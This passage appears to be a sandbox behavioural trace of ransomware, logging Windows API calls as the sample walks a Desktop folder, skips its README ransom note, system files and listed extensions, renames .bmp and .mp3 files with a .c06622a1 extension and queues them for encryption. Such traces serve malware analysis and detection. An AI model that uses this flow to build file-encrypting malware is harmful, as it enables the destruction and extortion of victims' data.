lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.680] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.680] ReadFile (in: hFile=0x1a8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.680] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x1453ed3 [0156.680] RtlComputeCrc32 (PartialCrc=0x3ed3, Buffer=0x32e9a4, Length=0x80) returned 0x5668654 [0156.680] RtlComputeCrc32 (PartialCrc=0x8654, Buffer=0x32e9a4, Length=0x80) returned 0x7e75c4d4 [0156.680] RtlComputeCrc32 (PartialCrc=0xc4d4, Buffer=0x32e9a4, Length=0x80) returned 0xf931f1eb [0156.681] RtlComputeCrc32 (PartialCrc=0xf1eb, Buffer=0x32e9a4, Length=0x80) returned 0x7fac8e03 [0156.681] CloseHandle (hObject=0x1a8) returned 1 [0156.681] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.681] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\M8sIlcr9Kip1-hC9n.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\M8sIlcr9Kip1-hC9n.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\M8sIlcr9Kip1-hC9n.bmp" [0156.681] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\M8sIlcr9Kip1-hC9n.bmp") returned 0x4d [0156.681] wcscpy (in: _Dest=0x3250102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.681] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\M8sIlcr9Kip1-hC9n.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\m8silcr9kip1-hc9n.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\M8sIlcr9Kip1-hC9n.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\m8silcr9kip1-hc9n.bmp.c06622a1"), dwFlags=0x8) returned 1 [0156.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\M8sIlcr9Kip1-hC9n.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\m8silcr9kip1-hc9n.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0156.690] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.690] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0156.694] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7101e9 [0156.694] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f1c1e44 [0156.695] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4b1a98f5 [0156.695] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x64233e24 [0156.695] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x218516a9 [0156.695] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8604cd2 [0156.695] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a6c0124 [0156.695] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xcdf64e0 [0156.698] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0xc2b6f0d8 [0156.698] RtlComputeCrc32 (PartialCrc=0xf0d8, Buffer=0x710094, Length=0x80) returned 0xa028d724 [0156.698] RtlComputeCrc32 (PartialCrc=0xd724, Buffer=0x710094, Length=0x80) returned 0x66bdcfeb [0156.698] RtlComputeCrc32 (PartialCrc=0xcfeb, Buffer=0x710094, Length=0x80) returned 0x5aa2e381 [0156.698] RtlComputeCrc32 (PartialCrc=0xe381, Buffer=0x710094, Length=0x80) returned 0xec1c117b [0156.698] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0156.698] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.698] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.698] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d0b4d0, ftCreationTime.dwHighDateTime=0x1d5dd28, ftLastAccessTime.dwLowDateTime=0x42eee2f0, ftLastAccessTime.dwHighDateTime=0x1d5dc1a, ftLastWriteTime.dwLowDateTime=0x42eee2f0, ftLastWriteTime.dwHighDateTime=0x1d5dc1a, nFileSizeHigh=0x0, nFileSizeLow=0x223a, dwReserved0=0x0, dwReserved1=0x0, cFileName="QC07dsKRwK y.mp3", cAlternateFileName="QC07DS~1.MP3")) returned 1 [0156.698] _wcsicmp (_Str1="QC07dsKRwK y.mp3", _Str2="README.c06622a1.TXT") returned -1 [0156.698] wcsstr (_Str="QC07dsKRwK y.mp3", _SubStr="README") returned 0x0 [0156.698] _wcsicmp (_Str1="autorun.inf", _Str2="QC07dsKRwK y.mp3") returned -16 [0156.698] wcslen (_String="autorun.inf") returned 0xb [0156.698] _wcsicmp (_Str1="boot.ini", _Str2="QC07dsKRwK y.mp3") returned -15 [0156.698] wcslen (_String="boot.ini") returned 0x8 [0156.698] _wcsicmp (_Str1="bootfont.bin", _Str2="QC07dsKRwK y.mp3") returned -15 [0156.698] wcslen (_String="bootfont.bin") returned 0xc [0156.698] _wcsicmp (_Str1="bootsect.bak", _Str2="QC07dsKRwK y.mp3") returned -15 [0156.698] wcslen (_String="bootsect.bak") returned 0xc [0156.698] _wcsicmp (_Str1="desktop.ini", _Str2="QC07dsKRwK y.mp3") returned -13 [0156.698] wcslen (_String="desktop.ini") returned 0xb [0156.698] _wcsicmp (_Str1="iconcache.db", _Str2="QC07dsKRwK y.mp3") returned -8 [0156.698] wcslen (_String="iconcache.db") returned 0xc [0156.698] _wcsicmp (_Str1="ntldr", _Str2="QC07dsKRwK y.mp3") returned -3 [0156.699] wcslen (_String="ntldr") returned 0x5 [0156.699] _wcsicmp (_Str1="ntuser.dat", _Str2="QC07dsKRwK y.mp3") returned -3 [0156.699] wcslen (_String="ntuser.dat") returned 0xa [0156.699] _wcsicmp (_Str1="ntuser.dat.log", _Str2="QC07dsKRwK y.mp3") returned -3 [0156.699] wcslen (_String="ntuser.dat.log") returned 0xe [0156.699] _wcsicmp (_Str1="ntuser.ini", _Str2="QC07dsKRwK y.mp3") returned -3 [0156.699] wcslen (_String="ntuser.ini") returned 0xa [0156.699] _wcsicmp (_Str1="thumbs.db", _Str2="QC07dsKRwK y.mp3") returned 3 [0156.699] wcslen (_String="thumbs.db") returned 0x9 [0156.699] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0156.699] wcslen (_String="386") returned 0x3 [0156.699] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0156.699] wcslen (_String="adv") returned 0x3 [0156.699] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0156.699] wcslen (_String="ani") returned 0x3 [0156.699] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0156.699] wcslen (_String="bat") returned 0x3 [0156.699] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0156.699] wcslen (_String="bin") returned 0x3 [0156.699] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0156.699] wcslen (_String="cab") returned 0x3 [0156.699] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0156.699] wcslen (_String="cmd") returned 0x3 [0156.699] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0156.699] wcslen (_String="com") returned 0x3 [0156.699] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0156.699] wcslen (_String="cpl") returned 0x3 [0156.699] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0156.699] wcslen (_String="cur") returned 0x3 [0156.699] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0156.699] wcslen (_String="deskthemepack") returned 0xd [0156.699] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0156.699] wcslen (_String="diagcab") returned 0x7 [0156.699] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0156.700] wcslen (_String="diagcfg") returned 0x7 [0156.700] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0156.700] wcslen (_String="diagpkg") returned 0x7 [0156.700] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0156.700] wcslen (_String="dll") returned 0x3 [0156.700] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0156.700] wcslen (_String="drv") returned 0x3 [0156.700] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0156.700] wcslen (_String="exe") returned 0x3 [0156.700] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0156.700] wcslen (_String="hlp") returned 0x3 [0156.700] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0156.700] wcslen (_String="icl") returned 0x3 [0156.700] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0156.700] wcslen (_String="icns") returned 0x4 [0156.700] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0156.700] wcslen (_String="ico") returned 0x3 [0156.700] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0156.700] wcslen (_String="ics") returned 0x3 [0156.700] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0156.700] wcslen (_String="idx") returned 0x3 [0156.700] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0156.700] wcslen (_String="ldf") returned 0x3 [0156.700] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0156.700] wcslen (_String="lnk") returned 0x3 [0156.700] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0156.700] wcslen (_String="mod") returned 0x3 [0156.700] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0156.700] wcslen (_String="mpa") returned 0x3 [0156.700] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0156.700] wcslen (_String="msc") returned 0x3 [0156.700] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0156.700] wcslen (_String="msp") returned 0x3 [0156.700] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0156.700] wcslen (_String="msstyles") returned 0x8 [0156.701] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0156.701] wcslen (_String="msu") returned 0x3 [0156.701] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0156.701] wcslen (_String="nls") returned 0x3 [0156.701] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0156.701] wcslen (_String="nomedia") returned 0x7 [0156.701] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0156.701] wcslen (_String="ocx") returned 0x3 [0156.701] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0156.701] wcslen (_String="prf") returned 0x3 [0156.701] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0156.701] wcslen (_String="ps1") returned 0x3 [0156.701] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0156.701] wcslen (_String="rom") returned 0x3 [0156.701] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0156.701] wcslen (_String="rtp") returned 0x3 [0156.701] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0156.701] wcslen (_String="scr") returned 0x3 [0156.701] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0156.701] wcslen (_String="shs") returned 0x3 [0156.701] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0156.701] wcslen (_String="spl") returned 0x3 [0156.701] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0156.701] wcslen (_String="sys") returned 0x3 [0156.701] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0156.701] wcslen (_String="theme") returned 0x5 [0156.701] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0156.701] wcslen (_String="themepack") returned 0x9 [0156.701] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0156.701] wcslen (_String="wpx") returned 0x3 [0156.701] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0156.701] wcslen (_String="lock") returned 0x4 [0156.701] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0156.701] wcslen (_String="key") returned 0x3 [0156.701] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0156.701] wcslen (_String="hta") returned 0x3 [0156.701] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0156.702] wcslen (_String="msi") returned 0x3 [0156.702] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0156.702] wcslen (_String="pdb") returned 0x3 [0156.702] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0156.702] wcslen (_String="sqlite") returned 0x6 [0156.702] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.702] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.702] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.702] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.702] wcscpy (in: _Dest=0x32400d0, _Source="QC07dsKRwK y.mp3" | out: _Dest="QC07dsKRwK y.mp3") returned="QC07dsKRwK y.mp3" [0156.702] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\QC07dsKRwK y.mp3", dwFileAttributes=0x80) returned 1 [0156.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\QC07dsKRwK y.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\qc07dskrwk y.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0156.702] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.702] ReadFile (in: hFile=0x1f0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.703] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x12c4215b [0156.703] RtlComputeCrc32 (PartialCrc=0x215b, Buffer=0x32e9a4, Length=0x80) returned 0xd5ddb68a [0156.703] RtlComputeCrc32 (PartialCrc=0xb68a, Buffer=0x32e9a4, Length=0x80) returned 0xc06cdbf [0156.703] RtlComputeCrc32 (PartialCrc=0xcdbf, Buffer=0x32e9a4, Length=0x80) returned 0x93eab699 [0156.703] RtlComputeCrc32 (PartialCrc=0xb699, Buffer=0x32e9a4, Length=0x80) returned 0x5f724210 [0156.703] CloseHandle (hObject=0x1f0) returned 1 [0156.703] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.703] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\QC07dsKRwK y.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\QC07dsKRwK y.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\QC07dsKRwK y.mp3" [0156.703] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\QC07dsKRwK y.mp3") returned 0x48 [0156.703] wcscpy (in: _Dest=0x32500f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.704] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\QC07dsKRwK y.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\qc07dskrwk y.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\QC07dsKRwK y.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\qc07dskrwk y.mp3.c06622a1"), dwFlags=0x8) returned 1 [0156.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\QC07dsKRwK y.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\qc07dskrwk y.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f0 [0156.706] CreateIoCompletionPort (FileHandle=0x1f0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.706] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0156.713] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c7e1cca [0156.713] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5fb4f715 [0156.713] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3bd3db0b [0156.713] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e191366 [0156.713] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x564c056a [0156.713] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7c4710de [0156.713] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x184ae802 [0156.713] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4300d016 [0156.716] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x295c6b4f [0156.716] RtlComputeCrc32 (PartialCrc=0x6b4f, Buffer=0x2690094, Length=0x80) returned 0xe4417fde [0156.716] RtlComputeCrc32 (PartialCrc=0x7fde, Buffer=0x2690094, Length=0x80) returned 0xf1d41c9b [0156.716] RtlComputeCrc32 (PartialCrc=0x1c9b, Buffer=0x2690094, Length=0x80) returned 0xa46d66de [0156.716] RtlComputeCrc32 (PartialCrc=0x66de, Buffer=0x2690094, Length=0x80) returned 0x701102ee [0156.716] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0156.716] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.716] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.716] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af64220, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8af64220, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8af64220, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.716] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.716] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf0c6360, ftCreationTime.dwHighDateTime=0x1d5e3e1, ftLastAccessTime.dwLowDateTime=0x2c159fd0, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0x2c159fd0, ftLastWriteTime.dwHighDateTime=0x1d5e122, nFileSizeHigh=0x0, nFileSizeLow=0x9d20, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ue7LWDJ Xw.doc", cAlternateFileName="UE7LWD~1.DOC")) returned 1 [0156.717] _wcsicmp (_Str1="Ue7LWDJ Xw.doc", _Str2="README.c06622a1.TXT") returned 3 [0156.717] wcsstr (_Str="Ue7LWDJ Xw.doc", _SubStr="README") returned 0x0 [0156.717] _wcsicmp (_Str1="autorun.inf", _Str2="Ue7LWDJ Xw.doc") returned -20 [0156.717] wcslen (_String="autorun.inf") returned 0xb [0156.717] _wcsicmp (_Str1="boot.ini", _Str2="Ue7LWDJ Xw.doc") returned -19 [0156.717] wcslen (_String="boot.ini") returned 0x8 [0156.717] _wcsicmp (_Str1="bootfont.bin", _Str2="Ue7LWDJ Xw.doc") returned -19 [0156.717] wcslen (_String="bootfont.bin") returned 0xc [0156.717] _wcsicmp (_Str1="bootsect.bak", _Str2="Ue7LWDJ Xw.doc") returned -19 [0156.717] wcslen (_String="bootsect.bak") returned 0xc [0156.717] _wcsicmp (_Str1="desktop.ini", _Str2="Ue7LWDJ Xw.doc") returned -17 [0156.717] wcslen (_String="desktop.ini") returned 0xb [0156.717] _wcsicmp (_Str1="iconcache.db", _Str2="Ue7LWDJ Xw.doc") returned -12 [0156.717] wcslen (_String="iconcache.db") returned 0xc [0156.717] _wcsicmp (_Str1="ntldr", _Str2="Ue7LWDJ Xw.doc") returned -7 [0156.717] wcslen (_String="ntldr") returned 0x5 [0156.717] _wcsicmp (_Str1="ntuser.dat", _Str2="Ue7LWDJ Xw.doc") returned -7 [0156.717] wcslen (_String="ntuser.dat") returned 0xa [0156.717] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Ue7LWDJ Xw.doc") returned -7 [0156.717] wcslen (_String="ntuser.dat.log") returned 0xe [0156.717] _wcsicmp (_Str1="ntuser.ini", _Str2="Ue7LWDJ Xw.doc") returned -7 [0156.717] wcslen (_String="ntuser.ini") returned 0xa [0156.717] _wcsicmp (_Str1="thumbs.db", _Str2="Ue7LWDJ Xw.doc") returned -1 [0156.717] wcslen (_String="thumbs.db") returned 0x9 [0156.717] _wcsicmp (_Str1="386", _Str2="doc") returned -49 [0156.717] wcslen (_String="386") returned 0x3 [0156.717] _wcsicmp (_Str1="adv", _Str2="doc") returned -3 [0156.717] wcslen (_String="adv") returned 0x3 [0156.717] _wcsicmp (_Str1="ani", _Str2="doc") returned -3 [0156.717] wcslen (_String="ani") returned 0x3 [0156.717] _wcsicmp (_Str1="bat", _Str2="doc") returned -2 [0156.717] wcslen (_String="bat") returned 0x3 [0156.718] _wcsicmp (_Str1="bin", _Str2="doc") returned -2 [0156.718] wcslen (_String="bin") returned 0x3 [0156.718] _wcsicmp (_Str1="cab", _Str2="doc") returned -1 [0156.718] wcslen (_String="cab") returned 0x3 [0156.718] _wcsicmp (_Str1="cmd", _Str2="doc") returned -1 [0156.718] wcslen (_String="cmd") returned 0x3 [0156.718] _wcsicmp (_Str1="com", _Str2="doc") returned -1 [0156.718] wcslen (_String="com") returned 0x3 [0156.718] _wcsicmp (_Str1="cpl", _Str2="doc") returned -1 [0156.718] wcslen (_String="cpl") returned 0x3 [0156.718] _wcsicmp (_Str1="cur", _Str2="doc") returned -1 [0156.718] wcslen (_String="cur") returned 0x3 [0156.718] _wcsicmp (_Str1="deskthemepack", _Str2="doc") returned -10 [0156.718] wcslen (_String="deskthemepack") returned 0xd [0156.718] _wcsicmp (_Str1="diagcab", _Str2="doc") returned -6 [0156.718] wcslen (_String="diagcab") returned 0x7 [0156.718] _wcsicmp (_Str1="diagcfg", _Str2="doc") returned -6 [0156.718] wcslen (_String="diagcfg") returned 0x7 [0156.718] _wcsicmp (_Str1="diagpkg", _Str2="doc") returned -6 [0156.718] wcslen (_String="diagpkg") returned 0x7 [0156.718] _wcsicmp (_Str1="dll", _Str2="doc") returned -3 [0156.718] wcslen (_String="dll") returned 0x3 [0156.718] _wcsicmp (_Str1="drv", _Str2="doc") returned 3 [0156.718] wcslen (_String="drv") returned 0x3 [0156.718] _wcsicmp (_Str1="exe", _Str2="doc") returned 1 [0156.718] wcslen (_String="exe") returned 0x3 [0156.718] _wcsicmp (_Str1="hlp", _Str2="doc") returned 4 [0156.718] wcslen (_String="hlp") returned 0x3 [0156.718] _wcsicmp (_Str1="icl", _Str2="doc") returned 5 [0156.718] wcslen (_String="icl") returned 0x3 [0156.718] _wcsicmp (_Str1="icns", _Str2="doc") returned 5 [0156.719] wcslen (_String="icns") returned 0x4 [0156.719] _wcsicmp (_Str1="ico", _Str2="doc") returned 5 [0156.719] wcslen (_String="ico") returned 0x3 [0156.719] _wcsicmp (_Str1="ics", _Str2="doc") returned 5 [0156.719] wcslen (_String="ics") returned 0x3 [0156.719] _wcsicmp (_Str1="idx", _Str2="doc") returned 5 [0156.719] wcslen (_String="idx") returned 0x3 [0156.719] _wcsicmp (_Str1="ldf", _Str2="doc") returned 8 [0156.719] wcslen (_String="ldf") returned 0x3 [0156.719] _wcsicmp (_Str1="lnk", _Str2="doc") returned 8 [0156.719] wcslen (_String="lnk") returned 0x3 [0156.719] _wcsicmp (_Str1="mod", _Str2="doc") returned 9 [0156.719] wcslen (_String="mod") returned 0x3 [0156.719] _wcsicmp (_Str1="mpa", _Str2="doc") returned 9 [0156.719] wcslen (_String="mpa") returned 0x3 [0156.719] _wcsicmp (_Str1="msc", _Str2="doc") returned 9 [0156.719] wcslen (_String="msc") returned 0x3 [0156.719] _wcsicmp (_Str1="msp", _Str2="doc") returned 9 [0156.719] wcslen (_String="msp") returned 0x3 [0156.719] _wcsicmp (_Str1="msstyles", _Str2="doc") returned 9 [0156.719] wcslen (_String="msstyles") returned 0x8 [0156.719] _wcsicmp (_Str1="msu", _Str2="doc") returned 9 [0156.719] wcslen (_String="msu") returned 0x3 [0156.719] _wcsicmp (_Str1="nls", _Str2="doc") returned 10 [0156.719] wcslen (_String="nls") returned 0x3 [0156.719] _wcsicmp (_Str1="nomedia", _Str2="doc") returned 10 [0156.719] wcslen (_String="nomedia") returned 0x7 [0156.719] _wcsicmp (_Str1="ocx", _Str2="doc") returned 11 [0156.719] wcslen (_String="ocx") returned 0x3 [0156.719] _wcsicmp (_Str1="prf", _Str2="doc") returned 12 [0156.719] wcslen (_String="prf") returned 0x3 [0156.720] _wcsicmp (_Str1="ps1", _Str2="doc") returned 12 [0156.720] wcslen (_String="ps1") returned 0x3 [0156.720] _wcsicmp (_Str1="rom", _Str2="doc") returned 14 [0156.720] wcslen (_String="rom") returned 0x3 [0156.720] _wcsicmp (_Str1="rtp", _Str2="doc") returned 14 [0156.720] wcslen (_String="rtp") returned 0x3 [0156.720] _wcsicmp (_Str1="scr", _Str2="doc") returned 15 [0156.720] wcslen (_String="scr") returned 0x3 [0156.720] _wcsicmp (_Str1="shs", _Str2="doc") returned 15 [0156.720] wcslen (_String="shs") returned 0x3 [0156.720] _wcsicmp (_Str1="spl", _Str2="doc") returned 15 